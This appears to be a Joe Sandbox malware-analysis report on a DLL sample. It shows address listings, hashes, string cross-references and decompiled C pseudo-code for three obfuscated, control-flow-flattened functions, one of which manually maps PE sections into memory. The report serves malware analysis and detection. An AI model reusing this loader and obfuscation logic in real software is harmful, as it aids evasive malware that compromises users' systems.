0x1001dbd9
0x1001dbdd
0x1001dbe2
0x1001dbea
0x1001dbf9
0x1001dbfc
0x1001dc00
0x1001dc08
0x1001dc10
0x1001dc18
0x1001dc25
0x1001dc29
0x1001dc31
0x1001dc3d
0x1001dc42
0x1001dc48
0x1001dc50
0x1001dc58
0x1001dc5d
0x1001dc6a
0x1001dc6b
0x1001dc6f
0x1001dc77
0x1001dc7f
0x1001dc87
0x1001dc8f
0x1001dc97
0x1001dca5
0x1001dca9
0x1001dcb1
0x1001dcb9
0x1001dcc1
0x1001dcc9
0x1001dcce
0x1001dcd6
0x1001dcde
0x1001dceb
0x1001dcef
0x1001dcf4
0x1001dcfc
0x1001dd04
0x1001dd0c
0x1001dd14
0x1001dd1c
0x1001dd24
0x1001dd2c
0x1001dd34
0x1001dd3c
0x1001dd49
0x1001dd4d
0x1001dd52
0x1001dd5a
0x1001dd62
0x1001dd6a
0x1001dd72
0x1001dd82
0x1001dd8a
0x1001dd94
0x1001dda7
0x1001ddaa
0x1001ddb3
0x1001ddb7
0x1001ddbf
0x1001ddc7
0x1001ddcf
0x1001ddd7
0x1001dddf
0x1001dde7
0x1001ddef
0x1001ddf7
0x1001ddff
0x1001de04
0x1001de0c
0x1001de14
0x1001de1c
0x1001de29
0x1001de2d
0x1001de35
0x1001de3d
0x1001de42
0x1001de4a
0x1001de52
0x1001de5a
0x1001de62
0x1001de67
0x1001de6f
0x1001de77
0x1001de7f
0x1001de87
0x1001de8f
0x1001de93
0x1001de98
0x1001dea0
0x1001dea8
0x1001deb0
0x1001deb5
0x1001debd
0x1001dec5
0x1001decd
0x1001ded5
0x1001deda
0x1001dee2
0x1001deea
0x1001def7
0x1001defb
0x1001df03
0x1001df0b
0x1001df13
0x1001df18
0x1001df1d
0x1001df1d
0x1001df25
0x1001df25
0x1001df25
0x1001df25
0x1001df27
0x00000000
0x00000000
0x1001df2d
0x1001dff3
0x1001dff8
0x1001dffb
0x1001e000
0x00000000
0x1001df33
0x1001df39
0x1001dfd5
0x1001dfda
0x1001dfdd
0x1001dfe2
0x00000000
0x1001df3f
0x1001df45
0x1001dfae
0x1001dfb3
0x1001dfb6
0x1001dfbb
0x00000000
0x1001df47
0x1001df4d
0x1001df8a
0x1001df8f
0x1001df92
0x1001df97
0x00000000
0x1001df4f
0x1001df55
0x1001df66
0x1001df6b
0x1001df6e
0x1001df73
0x00000000
0x1001df73
0x1001df55
0x1001df4d
0x1001df45
0x1001df39
0x00000000
0x1001df2d
0x1001e00d
0x1001e08a
0x1001e08f
0x1001e092
0x1001e097
0x1001e00f
0x1001e015
0x1001e063
0x1001e068
0x1001e06b
0x1001e070
0x00000000
0x1001e017
0x1001e01d
0x1001e039
0x1001e03e
0x1001e041
0x1001e046
0x00000000
0x1001e01f
0x1001e025
0x1001e027
0x00000000
0x1001e027
0x1001e025
0x1001e01d
0x1001e015
0x1001e099
0x1001e099
0x1001e0ae

Strings

y, xrefs: 1001DE1C
X, xrefs: 1001DE87
C, xrefs: 1001DDF7
JL, xrefs: 1001DC48
,R, xrefs: 1001DD94
w], xrefs: 1001DCB1
8$, xrefs: 1001DEA0
ka, xrefs: 1001DC7F

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,R$8$$C$JL$X$ka$w]$y
API String ID: 0-1177348588
Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction ID: 779c516947aafde23bc05dd26a0bec4250dc8a81a534d2b68ffcd6992df55222
Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction Fuzzy Hash: 20C110B29093818FD354DF24D58A40FFBE0BBC8758F104A2DF5969A260D7B4DA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000E044 Relevance: 10.2, Strings: 8, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E1000E044() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _t217;
				signed int _t229;
				intOrPtr _t233;
				intOrPtr _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				void* _t272;
				char _t276;
				signed int* _t277;
				void* _t279;

				_t277 =  &_v116;
				_v24 = 0x1c11a0;
				_t234 = 0;
				_v20 = 0;
				_v64 = 0x3d72;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0x0000ca76;
				_v68 = 0xf5cd;
				_v68 = _v68 + 0xffff2303;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x031a7530;
				_v96 = 0x9dde;
				_t236 = 0x63;
				_t272 = 0x178fbfee;
				_v96 = _v96 / _t236;
				_v96 = _v96 ^ 0xbe21e7a5;
				_v96 = _v96 | 0x0866bec9;
				_v96 = _v96 ^ 0xbe67b68d;
				_v100 = 0xb412;
				_v100 = _v100 | 0xcdc2e5f8;
				_v100 = _v100 + 0x255c;
				_v100 = _v100 ^ 0x3ca6a3af;
				_v100 = _v100 ^ 0xf165da8a;
				_v48 = 0xdf62;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0x0df67e0a;
				_v88 = 0x25f4;
				_v88 = _v88 >> 2;
				_v88 = _v88 + 0xffff1fdf;
				_v88 = _v88 ^ 0xffff2442;
				_v60 = 0x15df;
				_v60 = _v60 / _t236;
				_v60 = _v60 ^ 0x00004288;
				_v80 = 0x3276;
				_v80 = _v80 + 0xffff6148;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x1fffb761;
				_v84 = 0xd242;
				_t237 = 0x2a;
				_v84 = _v84 / _t237;
				_v84 = _v84 + 0x4474;
				_v84 = _v84 ^ 0x000073b3;
				_v56 = 0xcf32;
				_v56 = _v56 ^ 0x8ff9b71f;
				_v56 = _v56 ^ 0x8ff93793;
				_v116 = 0xfed9;
				_v116 = _v116 + 0xbfa2;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 * 0x49;
				_v116 = _v116 ^ 0x00007060;
				_v104 = 0xd971;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xb0610f19;
				_v104 = _v104 ^ 0xb061137f;
				_v72 = 0x5818;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0xc63d;
				_v72 = _v72 ^ 0x00b0f2f6;
				_v52 = 0x41b5;
				_v52 = _v52 ^ 0x7ab325a0;
				_v52 = _v52 ^ 0x7ab35b35;
				_v108 = 0x4ac4;
				_v108 = _v108 + 0xcc33;
				_t238 = 0x38;
				_v108 = _v108 / _t238;
				_v108 = _v108 | 0xd9acbeeb;
				_v108 = _v108 ^ 0xd9acd52b;
				_v112 = 0x4e86;
				_t239 = 0x47;
				_v112 = _v112 * 0x38;
				_v112 = _v112 >> 4;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0x0044e3e3;
				_v76 = 0x72be;
				_v76 = _v76 << 5;
				_v76 = _v76 << 0xf;
				_v76 = _v76 ^ 0x2be030c0;
				_v40 = 0x48f5;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x091e8e4b;
				_v44 = 0x527b;
				_v44 = _v44 + 0xffff49c6;
				_v44 = _v44 ^ 0xffffdf12;
				_v92 = 0xbc66;
				_v92 = _v92 * 0x33;
				_v92 = _v92 / _t239;
				_t240 = 0x72;
				_v92 = _v92 / _t240;
				_v92 = _v92 ^ 0x0000393e;
				_t271 = _v36;
				_t276 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t279 = _t272 - 0x178fbfee;
						if(_t279 > 0) {
							break;
						}
						if(_t279 == 0) {
							_t272 = 0xe2793e3;
							continue;
						}
						if(_t272 == 0x47767b9) {
							E1000DE81(_v112, _v32, _v76);
							_t272 = 0x28fbaa29;
							continue;
						}
						if(_t272 == 0x4d34f17) {
							_t229 = E1000F5E0(_v80, _v84, _v56,  &_v16,  &_v32, _v116);
							_t277 =  &(_t277[4]);
							asm("sbb esi, esi");
							_t272 = ( ~_t229 & 0x361a5899) + 0x47767b9;
							continue;
						}
						if(_t272 == 0x55060ae) {
							_t272 = 0x28fbaa29;
							if(_v36 > 2) {
								_t233 = E10011090( *((intOrPtr*)(_t271 + 8)), _v88,  &_v28, _v60);
								_v32 = _t233;
								if(_t233 != 0) {
									_t272 = 0x4d34f17;
								}
							}
							continue;
						}
						if(_t272 != 0xe2793e3) {
							goto L21;
						} else {
							_t276 = E10010DC5();
							_t272 = 0x18910253;
							continue;
						}
					}
					if(_t272 == 0x18910253) {
						_t217 = E100074A7(_v68, _v96, _v100,  &_v36, _t276, _v48);
						_t271 = _t217;
						_t277 =  &(_t277[4]);
						if(_t217 == 0) {
							_t272 = 0x3b81234c;
							goto L21;
						}
						_t272 = 0x55060ae;
						goto L1;
					}
					if(_t272 == 0x28fbaa29) {
						E10011C64(_v40, _v44, _v92, _t271);
						L24:
						return _t234;
					}
					if(_t272 != 0x3a91c052) {
						goto L21;
					}
					_t185 =  &_v108; // 0x44e3e3
					E100121A5(_v104, _v72, _v12, _v8 + 1, _v52,  *0x10021088 + 0x38,  *_t185);
					_t277 =  &(_t277[5]);
					_t234 = 1;
					_t272 = 0x47767b9;
					 *((intOrPtr*)( *0x10021088 + 0xc)) = _v16;
					goto L1;
					L21:
				} while (_t272 != 0x3b81234c);
				goto L24;
			}

0x1000e044
0x1000e047
0x1000e052
0x1000e054
0x1000e058
0x1000e060
0x1000e065
0x1000e06d
0x1000e075
0x1000e07d
0x1000e082
0x1000e08a
0x1000e09b
0x1000e0a0
0x1000e0a5
0x1000e0a9
0x1000e0b1
0x1000e0b9
0x1000e0c1
0x1000e0c9
0x1000e0d1
0x1000e0d9
0x1000e0e1
0x1000e0e9
0x1000e0f1
0x1000e0f6
0x1000e0fe
0x1000e106
0x1000e10b
0x1000e113
0x1000e11b
0x1000e12b
0x1000e131
0x1000e139
0x1000e141
0x1000e149
0x1000e14e
0x1000e156
0x1000e162
0x1000e165
0x1000e169
0x1000e171
0x1000e179
0x1000e181
0x1000e189
0x1000e191
0x1000e199
0x1000e1a1
0x1000e1ab
0x1000e1af
0x1000e1b7
0x1000e1bf
0x1000e1c4
0x1000e1c9
0x1000e1d1
0x1000e1d9
0x1000e1e1
0x1000e1e6
0x1000e1ee
0x1000e1f6
0x1000e1fe
0x1000e206
0x1000e20e
0x1000e216
0x1000e226
0x1000e22b
0x1000e231
0x1000e239
0x1000e241
0x1000e24e
0x1000e251
0x1000e255
0x1000e25a
0x1000e25f
0x1000e267
0x1000e26f
0x1000e274
0x1000e279
0x1000e281
0x1000e289
0x1000e28e
0x1000e296
0x1000e29e
0x1000e2a6
0x1000e2ae
0x1000e2bb
0x1000e2c7
0x1000e2cf
0x1000e2d2
0x1000e2d6
0x1000e2de
0x1000e2e2
0x1000e2e2
0x1000e2e6
0x1000e2e6
0x1000e2e6
0x1000e2e6
0x1000e2ec
0x00000000
0x00000000
0x1000e2f2
0x1000e3b9
0x00000000
0x1000e3b9
0x1000e2fe
0x1000e3a9
0x1000e3af
0x00000000
0x1000e3af
0x1000e30a
0x1000e37e
0x1000e383
0x1000e38a
0x1000e392
0x00000000
0x1000e392
0x1000e312
0x1000e337
0x1000e33c
0x1000e34e
0x1000e353
0x1000e35b
0x1000e35d
0x1000e35d
0x1000e35b
0x00000000
0x1000e33c
0x1000e31a
0x00000000
0x1000e320
0x1000e329
0x1000e32b
0x00000000
0x1000e32b
0x1000e31a
0x1000e3c9
0x1000e446
0x1000e44b
0x1000e44d
0x1000e452
0x1000e45e
0x00000000
0x1000e45e
0x1000e454
0x00000000
0x1000e454
0x1000e3d1
0x1000e47e
0x1000e488
0x1000e48e
0x1000e48e
0x1000e3dd
0x00000000
0x00000000
0x1000e3e3
0x1000e40c
0x1000e41f
0x1000e422
0x1000e423
0x1000e428
0x00000000
0x1000e463
0x1000e463
0x00000000

Strings

D, xrefs: 1000E220, 1000E092, 1000E249
`p, xrefs: 1000E1AF
tD, xrefs: 1000E169
v2, xrefs: 1000E139
{R, xrefs: 1000E296
D, xrefs: 1000E3E3
\%, xrefs: 1000E0D1
>9, xrefs: 1000E2D6

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: >9$\%$`p$tD$v2${R$D$D
API String ID: 0-2873933158
Opcode ID: ea1e3b87db37b2818d86fccfc0459b760cca66e852267f6aa65d8ae58ff8a401
Instruction ID: 3f16787a1e26ce642dc5bd9dbf8abbac04418e0539f2bcc101a0d71cf0f0bdac
Opcode Fuzzy Hash: ea1e3b87db37b2818d86fccfc0459b760cca66e852267f6aa65d8ae58ff8a401
Instruction Fuzzy Hash: 0CB1547290C3819FE354CF25C48940BBBE1FBD4398F408A1DF5A596264D3B4DA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10005B7D Relevance: 10.1, Strings: 8, Instructions: 136
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10005B7D(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _t120;
				void* _t128;
				void* _t136;
				void* _t138;
				signed int _t140;
				void* _t157;
				void* _t162;
				intOrPtr* _t164;
				signed int* _t166;
				signed int* _t167;
				signed int* _t168;

				_t164 = __edx;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t120 = E10012550(0);
				_v8 = _t120;
				_v4 = _t120;
				_v16 = 0xc2989;
				_v12 = 0x5a483c;
				_v52 = 0x3b44;
				_v52 = _v52 << 7;
				_t140 = 0x4c;
				_v52 = _v52 * 0x47;
				_v52 = _v52 ^ 0x0837fe00;
				_v60 = 0x214b;
				_v60 = _v60 + 0xffff3690;
				_v60 = _v60 + 0x4bfa;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0007dffd;
				_v68 = 0xfe09;
				_v68 = _v68 + 0x553f;
				_v68 = _v68 * 0x1d;
				_v68 = _v68 ^ 0x1b24c5d9;
				_v68 = _v68 ^ 0x1b02eedd;
				_v36 = 0xe0e0;
				_v36 = _v36 | 0x0a33301d;
				_v36 = _v36 ^ 0x0a33cb55;
				_v40 = 0x9bfa;
				_v40 = _v40 * 0x75;
				_v40 = _v40 ^ 0x004737ff;
				_v28 = 0x4d67;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x000d0c51;
				_v64 = 0x3be;
				_v64 = _v64 + 0xc067;
				_v64 = _v64 + 0x5cfa;
				_v64 = _v64 / _t140;
				_v64 = _v64 ^ 0x0000016e;
				_v32 = 0x9b8d;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x00006036;
				_v48 = 0x458d;
				_v48 = _v48 >> 3;
				_v48 = _v48 + 0xffffc11e;
				_v48 = _v48 ^ 0xffffb28b;
				_v24 = 0x2d22;
				_v24 = _v24 + 0xffff832a;
				_v24 = _v24 ^ 0xffffbd86;
				_v44 = 0xc1ed;
				_v44 = _v44 << 0xa;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xf6803b82;
				_v20 = 0x855f;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00003be3;
				_v56 = 0x7b80;
				_v56 = _v56 * 0x26;
				_v56 = _v56 + 0xffff7d11;
				_v56 = _v56 ^ 0x0011d251;
				_t141 = _v68;
				_t128 = E100198B1(_v68, _v36, _v40, __edx);
				_t166 =  &(( &_v68)[8]);
				_t136 = _t128;
				if(_t136 != 0) {
					_t157 = E10012A07( *((intOrPtr*)(_t136 + 0x50)), _v60 | _v52, _v28, _t141, _v64, _v56, _v32);
					_t167 =  &(_t166[5]);
					if(_t157 == 0) {
						L6:
						return _t157;
					}
					E10006374(_v48, _t157,  *((intOrPtr*)(_t136 + 0x54)),  *__edx, _v24);
					_t168 =  &(_t167[3]);
					_t162 = ( *(_t136 + 0x14) & 0x0000ffff) + 0x18 + _t136;
					_t138 = ( *(_t136 + 6) & 0x0000ffff) * 0x28 + _t162;
					while(_t162 < _t138) {
						_t134 =  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10));
						E10006374(_v44,  *((intOrPtr*)(_t162 + 0xc)) + _t157,  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10)),  *_t164 +  *((intOrPtr*)(_t162 + 0x14)), _v20);
						_t168 =  &(_t168[3]);
						_t162 = _t162 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}

0x10005b84
0x10005b86
0x10005b87
0x10005b8b
0x10005b8f
0x10005b93
0x10005b94
0x10005b95
0x10005b9a
0x10005ba0
0x10005ba4
0x10005bac
0x10005bb4
0x10005bbc
0x10005bc8
0x10005bca
0x10005bce
0x10005bd6
0x10005bde
0x10005be6
0x10005bee
0x10005bf3
0x10005bfb
0x10005c03
0x10005c10
0x10005c14
0x10005c1c
0x10005c24
0x10005c2c
0x10005c34
0x10005c3c
0x10005c49
0x10005c4d
0x10005c55
0x10005c62
0x10005c66
0x10005c6e
0x10005c76
0x10005c7e
0x10005c8c
0x10005c90
0x10005c98
0x10005ca0
0x10005ca5
0x10005cad
0x10005cb5
0x10005cba
0x10005cc2
0x10005cca
0x10005cd2
0x10005cda
0x10005ce2
0x10005cea
0x10005cef
0x10005cf4
0x10005cfc
0x10005d04
0x10005d09
0x10005d11
0x10005d1e
0x10005d22
0x10005d2a
0x10005d3a
0x10005d3e
0x10005d43
0x10005d46
0x10005d4a
0x10005d72
0x10005d74
0x10005d79
0x10005dd7
0x00000000
0x10005dd9
0x10005d8c
0x10005d95
0x10005d9f
0x10005da4
0x10005dd2
0x10005dbe
0x10005dc7
0x10005dcc
0x10005dcf
0x10005dcf
0x00000000
0x10005dd6
0x10005ddf

Strings

6`, xrefs: 10005CA5
<HZ, xrefs: 10005BAC
;, xrefs: 10005D09
"-, xrefs: 10005CCA
D;, xrefs: 10005BB4
gM, xrefs: 10005C55
?U, xrefs: 10005C03
K!, xrefs: 10005BD6

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "-$6`$<HZ$?U$D;$K!$gM$;
API String ID: 0-541240929
Opcode ID: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
Instruction ID: dedb1f603b9efd741f1bc024202ac541243ab8ecb83f28ac3f7716cc3bddbadf
Opcode Fuzzy Hash: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
Instruction Fuzzy Hash: BA5110B1408340ABD354CF65C88980BFBF5FBC8358F408A1DF99996260D3BAD948CF06

Uniqueness

Uniqueness Score: -1.00%

Function 10004844 Relevance: 9.0, Strings: 7, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10004844() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				unsigned int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				unsigned int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t297;
				void* _t300;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t348;
				signed int* _t352;

				_t352 =  &_v1156;
				_v1048 = 0xd4c9;
				_v1048 = _v1048 * 0x4c;
				_t348 = 0x16977827;
				_v1048 = _v1048 ^ 0x003f2fc5;
				_v1152 = 0x1223;
				_v1152 = _v1152 + 0xffffe86f;
				_v1152 = _v1152 << 0xe;
				_v1152 = _v1152 + 0xffffc4b4;
				_v1152 = _v1152 ^ 0xfea449db;
				_v1140 = 0xd009;
				_v1140 = _v1140 << 0xf;
				_v1140 = _v1140 | 0x34d7ffad;
				_t310 = 0x67;
				_v1140 = _v1140 * 0x78;
				_v1140 = _v1140 ^ 0x853faa5e;
				_v1108 = 0xfb19;
				_v1108 = _v1108 / _t310;
				_v1108 = _v1108 | 0xfc9c85cc;
				_v1108 = _v1108 + 0xffff75b2;
				_v1108 = _v1108 ^ 0xfc9bca28;
				_v1096 = 0x8988;
				_v1096 = _v1096 >> 0xf;
				_v1096 = _v1096 >> 2;
				_v1096 = _v1096 ^ 0xb058b54e;
				_v1096 = _v1096 ^ 0xb058a14a;
				_v1092 = 0x4bf5;
				_v1092 = _v1092 ^ 0x3fcc7587;
				_v1092 = _v1092 + 0xffff7c60;
				_v1092 = _v1092 ^ 0x3fcbd886;
				_v1124 = 0x90b1;
				_v1124 = _v1124 | 0x0315067d;
				_v1124 = _v1124 << 0xf;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x00061076;
				_v1100 = 0x6642;
				_v1100 = _v1100 + 0x2c45;
				_v1100 = _v1100 + 0xffffed6b;
				_v1100 = _v1100 + 0xc076;
				_v1100 = _v1100 ^ 0x000143f3;
				_v1132 = 0xeff1;
				_t311 = 0x75;
				_v1132 = _v1132 / _t311;
				_v1132 = _v1132 >> 4;
				_t312 = 0x1b;
				_v1132 = _v1132 * 0x22;
				_v1132 = _v1132 ^ 0x00007806;
				_v1064 = 0x9d13;
				_v1064 = _v1064 + 0xffff9636;
				_v1064 = _v1064 ^ 0x00006af4;
				_v1116 = 0xe2d7;
				_v1116 = _v1116 / _t312;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 << 2;
				_v1116 = _v1116 ^ 0x00007ff5;
				_v1080 = 0xca15;
				_v1080 = _v1080 << 8;
				_t313 = 0x44;
				_v1080 = _v1080 / _t313;
				_v1080 = _v1080 ^ 0x0002d41f;
				_v1148 = 0x482;
				_v1148 = _v1148 | 0x6f5ddb7d;
				_v1148 = _v1148 >> 7;
				_v1148 = _v1148 ^ 0x00de8355;
				_v1072 = 0xb874;
				_t314 = 0x5f;
				_v1072 = _v1072 / _t314;
				_v1072 = _v1072 ^ 0x00004463;
				_v1056 = 0xaefc;
				_v1056 = _v1056 | 0xd38cb8c2;
				_v1056 = _v1056 ^ 0xd38ca246;
				_v1144 = 0x8c63;
				_t315 = 0x7c;
				_v1144 = _v1144 / _t315;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 << 7;
				_v1144 = _v1144 ^ 0x00001598;
				_v1084 = 0x1bb3;
				_v1084 = _v1084 | 0xfc2ca821;
				_v1084 = _v1084 * 0x7a;
				_v1084 = _v1084 ^ 0x2d512892;
				_v1088 = 0x616c;
				_v1088 = _v1088 + 0xffff5892;
				_v1088 = _v1088 ^ 0x224cc7f0;
				_v1088 = _v1088 ^ 0xddb37e9b;
				_v1136 = 0x8caf;
				_v1136 = _v1136 >> 0xb;
				_v1136 = _v1136 >> 1;
				_v1136 = _v1136 * 0x1f;
				_v1136 = _v1136 ^ 0x00000e7d;
				_v1076 = 0xc9f6;
				_v1076 = _v1076 << 9;
				_v1076 = _v1076 >> 0xc;
				_v1076 = _v1076 ^ 0x0000608f;
				_v1068 = 0x998d;
				_v1068 = _v1068 ^ 0xf04ba484;
				_v1068 = _v1068 ^ 0xf04b529f;
				_v1128 = 0x17ad;
				_v1128 = _v1128 ^ 0xb750fecf;
				_v1128 = _v1128 ^ 0x37dc0b1b;
				_v1128 = _v1128 * 0x74;
				_v1128 = _v1128 ^ 0x3fd6ce0a;
				_v1044 = 0x27ee;
				_v1044 = _v1044 << 0xf;
				_v1044 = _v1044 ^ 0x13f7204f;
				_v1112 = 0xf1d1;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 >> 0xc;
				_v1112 = _v1112 + 0xffff75c7;
				_v1112 = _v1112 ^ 0x000ef6df;
				_v1060 = 0x618f;
				_v1060 = _v1060 + 0xffff6fb8;
				_v1060 = _v1060 ^ 0xffffc83e;
				_v1120 = 0x72ef;
				_v1120 = _v1120 >> 0xe;
				_v1120 = _v1120 + 0xffff6b18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xfffdf85c;
				_v1052 = 0xbded;
				_v1052 = _v1052 | 0xda406fe1;
				_v1052 = _v1052 ^ 0xda40c173;
				_v1156 = 0xd36a;
				_v1156 = _v1156 << 0xd;
				_v1156 = _v1156 << 0xa;
				_v1156 = _v1156 << 5;
				_v1156 = _v1156 ^ 0xa000634b;
				_v1104 = 0x4b7d;
				_v1104 = _v1104 + 0xffff7f0e;
				_v1104 = _v1104 << 6;
				_v1104 = _v1104 ^ 0x67f3b216;
				_v1104 = _v1104 ^ 0x98012c8f;
				_t297 = E10011999();
				do {
					while(_t348 != 0x16977827) {
						if(_t348 == 0x1a33a432) {
							return E1001CBE7( &_v520, _v1052, __eflags, _v1156, _v1104,  &_v1040);
						}
						if(_t348 == 0x25c7bc2a) {
							_push(0x10001348);
							_push(_v1088);
							_push(_v1084);
							_t300 = E10005DFC(_v1056, _v1144, __eflags);
							E1001BAEC(0x104, __eflags, _v1068, _t300,  *0x10021088 + 0x38, _v1128, _v1044,  &_v1040, E1000A156(),  *0x10021088 + 0x254);
							_t297 = E10010D6D(_v1112, _v1060, _v1120, _t300);
							_t352 =  &(_t352[0xd]);
							_t348 = 0x1a33a432;
							continue;
						}
						_t358 = _t348 - 0x33badc0c;
						if(_t348 != 0x33badc0c) {
							goto L8;
						}
						_push(0x100012d8);
						_push(_v1092);
						_push(_v1096);
						E1000A4D7(_t358, _v1100, _v1132, _v1064, _v1116, E10005DFC(_v1140, _v1108, _t358),  *0x10021088 + 0x254,  &_v520,  *0x10021088 + 0x38);
						_t297 = E10010D6D(_v1080, _v1148, _v1072, _t306);
						_t352 =  &(_t352[0xd]);
						_t348 = 0x25c7bc2a;
					}
					_t348 = 0x33badc0c;
					L8:
					__eflags = _t348 - 0x27e22baf;
				} while (__eflags != 0);
				return _t297;
			}

0x10004844
0x1000484a
0x1000485d
0x10004861
0x10004866
0x1000486e
0x10004876
0x1000487e
0x10004883
0x1000488b
0x10004893
0x1000489b
0x100048a0
0x100048af
0x100048b2
0x100048b6
0x100048be
0x100048ce
0x100048d2
0x100048da
0x100048e2
0x100048ea
0x100048f2
0x100048f7
0x100048fc
0x10004904
0x1000490c
0x10004914
0x1000491c
0x10004924
0x1000492c
0x10004934
0x1000493c
0x10004941
0x10004946
0x1000494e
0x10004956
0x1000495e
0x10004966
0x1000496e
0x10004976
0x10004982
0x10004987
0x1000498d
0x10004997
0x1000499a
0x1000499e
0x100049a6
0x100049ae
0x100049b6
0x100049be
0x100049ce
0x100049d2
0x100049d7
0x100049dc
0x100049e4
0x100049ec
0x100049f5
0x100049f8
0x100049fc
0x10004a06
0x10004a0e
0x10004a16
0x10004a1b
0x10004a23
0x10004a31
0x10004a36
0x10004a3c
0x10004a44
0x10004a4c
0x10004a54
0x10004a5c
0x10004a68
0x10004a6b
0x10004a6f
0x10004a74
0x10004a79
0x10004a81
0x10004a89
0x10004a96
0x10004a9a
0x10004aa2
0x10004aaa
0x10004ab2
0x10004aba
0x10004ac2
0x10004aca
0x10004acf
0x10004ad8
0x10004adc
0x10004ae4
0x10004aec
0x10004af1
0x10004af6
0x10004afe
0x10004b06
0x10004b0e
0x10004b16
0x10004b1e
0x10004b26
0x10004b33
0x10004b37
0x10004b3f
0x10004b4a
0x10004b52
0x10004b5d
0x10004b65
0x10004b6a
0x10004b6f
0x10004b77
0x10004b7f
0x10004b87
0x10004b8f
0x10004b97
0x10004b9f
0x10004ba4
0x10004bac
0x10004bb1
0x10004bb9
0x10004bc1
0x10004bc9
0x10004bd1
0x10004bd9
0x10004bde
0x10004be3
0x10004be8
0x10004bf0
0x10004bf8
0x10004c00
0x10004c05
